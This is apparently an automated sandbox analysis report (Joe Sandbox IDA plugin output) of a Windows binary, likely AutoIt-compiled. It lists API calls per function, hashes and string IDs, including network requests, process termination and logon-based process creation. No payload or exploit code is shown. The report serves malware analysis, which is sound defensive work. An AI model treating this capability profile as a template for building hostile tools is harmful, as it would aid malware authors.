                                                            • Instruction ID: d0a7ae81ebfb938ba6666c79e6a2c0397278e64191ffea9f5d552758a832e774
                                                            • Opcode Fuzzy Hash: 53201d12facd2b2c113c78097a12378f4040092ba43dddfa8d04ff9289680bf5
                                                            • Instruction Fuzzy Hash: 2051A274910306EFDF25CF68D98CAADBBF4AF44314F14816BE811AB2D2D7708928CB61
                                                            APIs
                                                              • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 001A179A
                                                            • GetWindowRect.USER32(?,?), ref: 001A17FE
                                                            • ScreenToClient.USER32(?,?), ref: 001A181B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001A182C
                                                            • EndPaint.USER32(?,?), ref: 001A1876
                                                            Similarity
                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                            • String ID:
                                                            • API String ID: 1827037458-0
                                                            • Opcode ID: b42002a726ff904679915899620d5a59f60b92b4713c07d458210a1d26230344
                                                            • Instruction ID: 8e0efad97d867fb64266eb430aa4e016dde1bca4ce22970a4934c4fa4e45a6e6
                                                            • Opcode Fuzzy Hash: b42002a726ff904679915899620d5a59f60b92b4713c07d458210a1d26230344
                                                            • Instruction Fuzzy Hash: 5A41CC34504300AFC720DF64DC88FBA7BF8EB4A724F144629F9A58B2A1C7709849DB61
                                                            APIs
                                                            • ShowWindow.USER32(002667B0,00000000,00B96640,?,?,002667B0,?,0022B862,?,?), ref: 0022B9CC
                                                            • EnableWindow.USER32(00000000,00000000), ref: 0022B9F0
                                                            • ShowWindow.USER32(002667B0,00000000,00B96640,?,?,002667B0,?,0022B862,?,?), ref: 0022BA50
                                                            • ShowWindow.USER32(00000000,00000004,?,0022B862,?,?), ref: 0022BA62
                                                            • EnableWindow.USER32(00000000,00000001), ref: 0022BA86
                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0022BAA9
                                                            Similarity
                                                            • API ID: Window$Show$Enable$MessageSend
                                                            • String ID:
                                                            • API String ID: 642888154-0
                                                            • Opcode ID: 07f205c229ec85e2c46924aa66f0ef5cbfc62a90e69d8607080f48bc9ea740c8
                                                            • Instruction ID: fcb3e04e50d2957fd2695044df69bd585ec9459e3f02a5612f4f1b4aaef7771a
                                                            • Opcode Fuzzy Hash: 07f205c229ec85e2c46924aa66f0ef5cbfc62a90e69d8607080f48bc9ea740c8
                                                            • Instruction Fuzzy Hash: 73417230611252BFDB22CF94E589B957BE0FF05310F5841B9EA588F6A2C731A856CF90
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,00215134,?,?,00000000,00000001), ref: 002173BF
                                                              • Part of subcall function 00213C94: GetWindowRect.USER32(?,?), ref: 00213CA7
                                                            • GetDesktopWindow.USER32 ref: 002173E9
                                                            • GetWindowRect.USER32(00000000), ref: 002173F0
                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00217422
                                                              • Part of subcall function 002054E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0020555E
                                                            • GetCursorPos.USER32(?), ref: 0021744E
                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002174AC
                                                            Similarity
                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                            • String ID:
                                                            • API String ID: 4137160315-0
                                                            • Opcode ID: 98a4a600ad76df8877f7e3156f46fff0f5d5d2698b55f86dd70b5c1392d1e59e
                                                            • Instruction ID: cbfeffeeaa4c5989238cb95be87d1e2589cf36fcf8c87744416cefaea2786c92
                                                            • Opcode Fuzzy Hash: 98a4a600ad76df8877f7e3156f46fff0f5d5d2698b55f86dd70b5c1392d1e59e
                                                            • Instruction Fuzzy Hash: 9131F272508316ABC730DF54D849F9BBBF9FF98304F000929F48997191C630E959CB92
                                                            APIs
                                                              • Part of subcall function 001F85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001F8608
                                                              • Part of subcall function 001F85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001F8612
                                                              • Part of subcall function 001F85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001F8621
                                                              • Part of subcall function 001F85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001F8628
                                                              • Part of subcall function 001F85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001F863E
                                                            • GetLengthSid.ADVAPI32(?,00000000,001F8977), ref: 001F8DAC
                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001F8DB8
                                                            • HeapAlloc.KERNEL32(00000000), ref: 001F8DBF
                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 001F8DD8
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,001F8977), ref: 001F8DEC
                                                            • HeapFree.KERNEL32(00000000), ref: 001F8DF3
                                                            Similarity
                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                            • String ID:
                                                            • API String ID: 3008561057-0
                                                            • Opcode ID: 6154d5093f84022032bd5cf8fe818343b2135d91181652919c9dcf4ff3084288
                                                            • Instruction ID: 47f80b6c18a2897ca5f024572e225d2a63ba5b7ef11bef1ff4a5098f212aa86f
                                                            • Opcode Fuzzy Hash: 6154d5093f84022032bd5cf8fe818343b2135d91181652919c9dcf4ff3084288
                                                            • Instruction Fuzzy Hash: 7A11BE31A00609FFDB649FE4DD09BBE7BB9FF55315F104029E94997290CB329901CB60
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001F8B2A
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 001F8B31
                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 001F8B40
                                                            • CloseHandle.KERNEL32(00000004), ref: 001F8B4B
                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001F8B7A
                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 001F8B8E
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
                                                            APIs
                                                              • Part of subcall function 001A12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001A134D
                                                              • Part of subcall function 001A12F3: SelectObject.GDI32(?,00000000), ref: 001A135C
                                                              • Part of subcall function 001A12F3: BeginPath.GDI32(?), ref: 001A1373
                                                              • Part of subcall function 001A12F3: SelectObject.GDI32(?,00000000), ref: 001A139C
                                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0022C1C4
                                                            • LineTo.GDI32(00000000,00000003,?), ref: 0022C1D8
                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0022C1E6
                                                            • LineTo.GDI32(00000000,00000000,?), ref: 0022C1F6
                                                            • EndPath.GDI32(00000000), ref: 0022C206
                                                            • StrokePath.GDI32(00000000), ref: 0022C216
                                                            Similarity
                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                            • String ID:
                                                            • API String ID: 43455801-0
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 001C03D3
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 001C03DB
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 001C03E6
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 001C03F1
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 001C03F9
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 001C0401
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0020569B
                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 002056B1
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 002056C0
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002056CF
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002056D9
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 002056E0
                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 002074E5
                                                            • EnterCriticalSection.KERNEL32(?,?,001B1044,?,?), ref: 002074F6
                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,001B1044,?,?), ref: 00207503
                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,001B1044,?,?), ref: 00207510
                                                              • Part of subcall function 00206ED7: CloseHandle.KERNEL32(00000000,?,0020751D,?,001B1044,?,?), ref: 00206EE1
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00207523
                                                            • LeaveCriticalSection.KERNEL32(?,?,001B1044,?,?), ref: 0020752A
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001F8E7F
                                                            • UnloadUserProfile.USERENV(?,?), ref: 001F8E8B
                                                            • CloseHandle.KERNEL32(?), ref: 001F8E94
                                                            • CloseHandle.KERNEL32(?), ref: 001F8E9C
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 001F8EA5
                                                            • HeapFree.KERNEL32(00000000), ref: 001F8EAC
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            APIs
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00232C7C,?), ref: 001F7C32
                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00232C7C,?), ref: 001F7C4A
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,0022FB80,000000FF,?,00000000,00000800,00000000,?,00232C7C,?), ref: 001F7C6F
                                                            • _memcmp.LIBCMT ref: 001F7C90
                                                            Similarity
                                                            • API ID: FromProg$FreeTask_memcmp
                                                            • String ID: ,,#
                                                            • API String ID: 314563124-1430289482
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00218928
                                                            • CharUpperBuffW.USER32(?,?), ref: 00218A37
                                                            • VariantClear.OLEAUT32(?), ref: 00218BAF
                                                              • Part of subcall function 00207804: VariantInit.OLEAUT32(00000000), ref: 00207844
                                                              • Part of subcall function 00207804: VariantCopy.OLEAUT32(00000000,?), ref: 0020784D
                                                              • Part of subcall function 00207804: VariantClear.OLEAUT32(00000000), ref: 00207859
                                                            Similarity
                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                            • API String ID: 4237274167-1221869570
                                                            APIs
                                                              • Part of subcall function 001BFEC6: _wcscpy.LIBCMT ref: 001BFEE9
                                                            • _memset.LIBCMT ref: 00203077
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 002030A6
                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00203159
                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00203187
                                                            Similarity
                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                            • String ID: 0
                                                            • API String ID: 4152858687-4108050209
                                                            APIs
                                                            • _memset.LIBCMT ref: 00202CAF
                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00202CCB
                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00202D11
                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00266890,00000000), ref: 00202D5A
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem_memset
                                                            • String ID: 0
                                                            • API String ID: 1173514356-4108050209
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0021DAD9
                                                              • Part of subcall function 001A79AB: _memmove.LIBCMT ref: 001A79F9
                                                            Similarity
                                                            • API ID: BuffCharLower_memmove
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 3425801089-567219261
                                                            APIs
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                              • Part of subcall function 001FB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 001FB0E7
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 001F93F6
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 001F9409
                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 001F9439
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_memmove$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 365058703-1403004172
                                                            • Opcode ID: 592e8930aa31bb5164198ec1c0e789fdf815ce189177c92213b5986e8694e081
                                                            • Instruction ID: e9b7fc39b3d7d70be5e3c73ea67a18aa528355d11b751b9ad2a68277dfa27b00
                                                            • Opcode Fuzzy Hash: 592e8930aa31bb5164198ec1c0e789fdf815ce189177c92213b5986e8694e081
                                                            • Instruction Fuzzy Hash: 782135B5904108BFDB18ABB0DC85DFFB77CDF66360B104129FA21972E1DB354A4A8A60
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00211B40
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00211B66
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00211B96
                                                            • InternetCloseHandle.WININET(00000000), ref: 00211BDD
                                                              • Part of subcall function 00212777: GetLastError.KERNEL32(?,?,00211B0B,00000000,00000000,00000001), ref: 0021278C
                                                              • Part of subcall function 00212777: SetEvent.KERNEL32(?,?,00211B0B,00000000,00000000,00000001), ref: 002127A1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3113390036-3916222277
                                                            • Opcode ID: 72867ca8eb7b3589a6f0bcfb0b69791620d17b69e82d99c288922ff1e90c653f
                                                            • Instruction ID: 5d4ecbaf2991f25b1741bc0528dc550b5724d9afdb5cd09eae7c52f1fa217bdc
                                                            • Opcode Fuzzy Hash: 72867ca8eb7b3589a6f0bcfb0b69791620d17b69e82d99c288922ff1e90c653f
                                                            • Instruction Fuzzy Hash: AE21C571514208BFEB219F509CC5EFFB6FCEB59748F10412AF50592140EB709E655761
                                                            APIs
                                                              • Part of subcall function 001A1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 001A1D73
                                                              • Part of subcall function 001A1D35: GetStockObject.GDI32(00000011), ref: 001A1D87
                                                              • Part of subcall function 001A1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 001A1D91
                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002266D0
                                                            • LoadLibraryW.KERNEL32(?), ref: 002266D7
                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002266EC
                                                            • DestroyWindow.USER32(?), ref: 002266F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                            • String ID: SysAnimate32
                                                            • API String ID: 4146253029-1011021900
                                                            • Opcode ID: 33808ced20abfbbf10357a4d27a634501357934f6652c1af2cd30cf6f5a90574
                                                            • Instruction ID: 9063f39b51ecc6c69340584b202814d85af6e468c15437b99764bc7be86b8a8a
                                                            • Opcode Fuzzy Hash: 33808ced20abfbbf10357a4d27a634501357934f6652c1af2cd30cf6f5a90574
                                                            • Instruction Fuzzy Hash: A9219F72120216BFEF104FE4FC88EBB77ADEB59368F104629F911921A0D7B5CC619B60
                                                            APIs
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 0020705E
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00207091
                                                            • GetStdHandle.KERNEL32(0000000C), ref: 002070A3
                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 002070DD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: 8dddfa4d971ab1ca84a435b2e38449dda9e65553d21f48eaca7a3b73595ed701
                                                            • Instruction ID: eb6a9268467633a9274d6c7b23fc97144a3ef18df2b8b1706856e4d02e4f7b3b
                                                            • Opcode Fuzzy Hash: 8dddfa4d971ab1ca84a435b2e38449dda9e65553d21f48eaca7a3b73595ed701
                                                            • Instruction Fuzzy Hash: 2121817492430AABDB209F68DC09A9A77B9BF55720F204729FCA1D72D1E770A861CB50
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0020712B
                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0020715D
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0020716E
                                                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002071A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CreateHandle$FilePipe
                                                            • String ID: nul
                                                            • API String ID: 4209266947-2873401336
                                                            • Opcode ID: de3b88b7fba90df12759432f328e92768bc04b916d43f5f03752fae6e470dd14
                                                            • Instruction ID: 3e06d7e3893289c096319414d9fadaedc062a087abaf1da0c3af6d865d60c34f
                                                            • Opcode Fuzzy Hash: de3b88b7fba90df12759432f328e92768bc04b916d43f5f03752fae6e470dd14
                                                            • Instruction Fuzzy Hash: 0821B675A14306ABDF209F689C48A99F7F8AF55720F200719FDA5D32D1D770B861CB50
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0020AEBF
                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0020AF13
                                                            • __swprintf.LIBCMT ref: 0020AF2C
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0022F910), ref: 0020AF6A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                            • String ID: %lu
                                                            • API String ID: 3164766367-685833217
                                                            • Opcode ID: f9302fb07c325754b5390984604dc343aac64da48ada004a370473ec9e07779e
                                                            • Instruction ID: 6c906c1b73fc41a94520ba387383bd8c9bfa6ae788d65c546a57069d37e25f97
                                                            • Opcode Fuzzy Hash: f9302fb07c325754b5390984604dc343aac64da48ada004a370473ec9e07779e
                                                            • Instruction Fuzzy Hash: E6214434600209BFCB10EF94DD89DAE7BB8EF49704B104069F909EB251DB71EA55CB61
                                                            APIs
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                              • Part of subcall function 001FA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 001FA399
                                                              • Part of subcall function 001FA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 001FA3AC
                                                              • Part of subcall function 001FA37C: GetCurrentThreadId.KERNEL32 ref: 001FA3B3
                                                              • Part of subcall function 001FA37C: AttachThreadInput.USER32(00000000), ref: 001FA3BA
                                                            • GetFocus.USER32 ref: 001FA554
                                                              • Part of subcall function 001FA3C5: GetParent.USER32(?), ref: 001FA3D3
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 001FA59D
                                                            • EnumChildWindows.USER32(?,001FA615), ref: 001FA5C5
                                                            • __swprintf.LIBCMT ref: 001FA5DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                            • String ID: %s%d
                                                            • API String ID: 1941087503-1110647743
                                                            • Opcode ID: 8587dbff5ef512c2fc485ddcccf304137baf2b364d7e94f191fdc68af95c911c
                                                            • Instruction ID: 38ab1cba9806de7f1ad9f0e096436983efc4d2a0a19225b1067d269a69e80c48
                                                            • Opcode Fuzzy Hash: 8587dbff5ef512c2fc485ddcccf304137baf2b364d7e94f191fdc68af95c911c
                                                            • Instruction Fuzzy Hash: 171190B1640209BBDF107FA0EC89FFA377CAF59710F444075BA1CAA192CB7459458B75
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 00202048
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                            • API String ID: 3964851224-769500911
                                                            • Opcode ID: 014d50862c245c304508e76f6c39657554760fdf3c05df18a624a82386e20be3
                                                            • Instruction ID: 2b4c945aaa6d2fb555791346970a7f0e6d5b8e9979f8f7315adeb18553065130
                                                            • Opcode Fuzzy Hash: 014d50862c245c304508e76f6c39657554760fdf3c05df18a624a82386e20be3
                                                            • Instruction Fuzzy Hash: 94115E3492020ADFCF00EFA4D9519FEB7B5FF36304B108569D85667292EB329E1ACB50
                                                            APIs
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0021EF1B
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0021EF4B
                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0021F07E
                                                            • CloseHandle.KERNEL32(?), ref: 0021F0FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                            • String ID:
                                                            • API String ID: 2364364464-0
                                                            • Opcode ID: bd1b9ff0ee1729fe30c5a2d4fc8e26d51364c6e59c5866fbc47b945f082ece11
                                                            • Instruction ID: 104f0cb542264234b23eb07feb6f1252a44579e6e7bc2bc001a311bbc91b51ff
                                                            • Opcode Fuzzy Hash: bd1b9ff0ee1729fe30c5a2d4fc8e26d51364c6e59c5866fbc47b945f082ece11
                                                            • Instruction Fuzzy Hash: C381A475610311AFD720DF24CD46F6AB7E5AF68720F04882DF999DB292DBB0AC81CB41
                                                            APIs
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
